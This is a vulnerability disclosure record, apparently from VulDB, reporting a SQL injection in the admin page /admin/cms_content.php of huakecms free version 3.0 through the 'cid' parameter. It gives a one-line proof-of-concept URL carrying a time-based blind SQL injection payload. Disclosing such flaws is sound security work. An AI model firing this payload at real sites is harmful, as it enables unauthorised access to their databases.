| 标题 | huakecms free version3.0 was discovered to contain SQL injection vulnerability |
|---|
| 描述 | 华科网站管理系统免费版3.0(huakecms free version 3.0) is a set of intelligent website building software based on PHP! The product has the characteristics of novel and beautiful interface, dynamic and fashionable, etc. It is a CMS content management system serving small and medium-sized enterprises. The threshold for using the software is low, no professional computer knowledge is required, full back-end operation management, simple operation and powerful functions, and the software also has extremely Strong scalability, can adapt to different needs of various industries.
[Suggested description]
huakecms free version 3.0 was discovered to contain SQL injection vulnerability in /admin/cms_content.php
[Vulnerability Type]
SQL INJECTION
[Vendor of Product]
http://www.huakecms.com/
[Affected Product Code Base]
huakecms free version Dev 3.0
[Affected Component]
File: /admin/cms_content.php
Parameter: cid
[Attack Type]
Remote
[poc]
http://localhost:8086/admin/cms_content.php?key=t&type=&search=%E7%BB%BC%E5%90%88%E6%9D%A1%E4%BB%B6%E6%9F%A5%E8%AF%A2&cid=1 AND (SELECT 3158 FROM (SELECT(SLEEP(5)))YkeQ) |
|---|
| 来源 | ⚠️ https://github.com/yhy217/huakecms-vul/issues/1 |
|---|
| 用户 | jamspilly (UID 54414) |
|---|
| 提交 | 2023-09-19 07時00分 (3 年前) |
|---|
| 管理 | 2023-09-29 07時38分 (10 days later) |
|---|
| 状态 | 已接受 |
|---|
| VulDB条目 | 240877 [huakecms 3.0 /admin/cms_content.php cid SQL注入] |
|---|
| 积分 | 20 |
|---|